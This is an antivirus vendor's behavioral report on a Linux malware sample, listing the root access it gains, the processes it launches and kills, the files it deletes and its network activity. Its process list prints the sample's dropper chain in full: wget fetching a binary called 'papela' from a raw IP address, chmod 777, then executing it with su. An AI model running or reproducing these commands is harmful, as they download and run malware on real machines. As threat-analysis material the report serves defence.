Linux.Siggen.541
Added to the Dr.Web virus database: 2018-04-21
Virus description added: 2018-04-21
Technical Information
Malicious functions:
Gains root privileges
Launches itself as a daemon
Performs process tracing:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
- /usr"/papela
- /usr/papela
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- rm -r papela
- clear
- apt-get -y install wget
- /usr/bin/dpkg --print-foreign-architectures
- /usr/lib/apt/methods/http
- sleep 3
- wget -q http://145.239.212.1/dos/yol/diz/sur/aurora/papela
- chmod 777 papela
- su -c ./papela
- bash -c ./papela
- ./papela
- /bin/bash ./papela -c exec './papela' \"$@\" ./papela
- /bin/bash ./papela -c
- rm -r aurorakur aurorayon tscs ckaur
- sleep 0.3
Kills the following processes:
- <SAMPLE>
- <SAMPLE_FULL_PATH>
- /usr/lib/apt/methods/http
- /usr"/papela
- /usr/papela
Performs operations with the file system:
Modifies file access rights:
Creates or modifies files:
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
- /usr"/papela
- /usr/papela
Deletes files:
- /usr"/papela"
- /usr"/aurorakur"
- /usr"/aurorayon"
- /usr"/tscs"
- /usr"/ckaur"
Network activity:
Establishes connection:
HTTP GET requests:
- ft#.##.######.######bian/pool/main/w/wget/wget_1.16-1%2bdeb8u1_amd64.deb
- 14#.###.###.1/dos/yol/diz/sur/aurora/papela
DNS ASK:
Curing recommendations
Linux